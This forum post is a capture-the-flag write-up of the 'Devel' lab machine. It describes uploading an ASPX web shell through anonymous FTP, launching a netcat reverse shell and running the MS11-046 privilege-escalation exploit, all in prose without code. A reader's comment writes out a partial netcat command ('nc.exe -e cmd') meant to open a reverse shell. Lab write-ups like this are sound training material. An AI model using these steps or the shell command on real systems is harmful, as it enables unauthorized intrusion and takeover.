Metasploitless Devel
PDF with images: https://jdwhitaker.github.io/static/devel.pdf
The Devel box is great beginner-level challenge. The official walkthrough uses Metasploit. The box hinges on an unrealistic configuration issue where the FTP root is the same as the web root, and anonymous users may upload to the server. We leverage an ASPX web shell to gain a full reverse shell. Identifying the system architecture reveals it may have the privilege escalation vulnerability described in MS11-046. This proves to be true, as executing the binary yields full system access on the machine.
Methods
Initial Reconnaissance: Port Scanning
We nmap the target IP address with the default top ports, performing version scanning (-sV) and default script scanning (-sC).
We find that anonymous FTP login is allowed, and that the server is a Windows machine running IIS 7.5. We also find that the FTP root appears to be the same as the web root. After searching “IIS 7.5 asp” on the web, we find that classic ASP is not installed by default on IIS 7.0 and above. This indicates the server likely supports ASPX instead.
Web Shell
We upload the ASPX web shell and Windows netcat binary included with Kali.
We will use netcat to connect back to our machine for a standard reverse shell.
Upgrading to a Reverse Shell
We use our web shell to identify the location of the netcat binary we uploaded through ftp.
We run a netcat reverse shell back to our local machine.
Additional Reconnaissance: System Information
The OS Versions is 6.1.7600 N/A Build 7600.
Privilege Escalation
Searching “6.1.7600 N/A Build 7600 privilege escalation” online results in an exploit at https: //www.exploit-db.com/exploits/40564. This exploits the vulnerability described in MS11-046.
We search for MS11-046 with searchsploit, compile the exploit we find [1] [2], and upload it to the remote target.
We execute the binary and gain system access.
Loot
We search for the flag files and print them.
Quick Links
Categories
- 2.8K All Categories
- 2K Discussion
- 1K Machines
- 395 Challenges
- 14 RastaLabs
- 85 Exploits
- 22 Programming
- 435 Off-topic
- 805 Tutorials
- 457 Writeups
- 81 Video Tutorials
- 121 Tools
- 144 Other
- 22 Links
- 22 News
Comments
Nice, thanks.
Question.. when using the "Execute" command in the web browser...
Is it typed as entire directory of the uploaded nc.exe? Below example:
C:\inetpub\wwwroot\nc.exe -e cmd
Because when I did this, it didn't work... because shell back to the machine didn't catch anything....